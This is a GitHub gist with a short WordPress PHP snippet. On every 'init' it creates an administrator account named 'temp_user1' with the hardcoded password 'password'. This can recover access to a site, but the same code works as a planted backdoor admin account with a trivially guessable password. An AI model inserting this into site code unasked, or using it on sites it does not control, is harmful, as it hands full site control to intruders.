Skip to content

Instantly share code, notes, and snippets.

@trepmal
Created March 4, 2014 04:12
Show Gist options
  • Save trepmal/9340161 to your computer and use it in GitHub Desktop.
Save trepmal/9340161 to your computer and use it in GitHub Desktop.
<?php
add_action('init', 'create_new_admin');
function create_new_admin() {
$user_name = 'temp_user1';
$password = 'password';
$user_id = username_exists( $user_name );
if ( ! $user_id ) {
$id = wp_create_user( $user_name, $password );
$user = new WP_User( $id );
$user->set_role( 'administrator' );
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment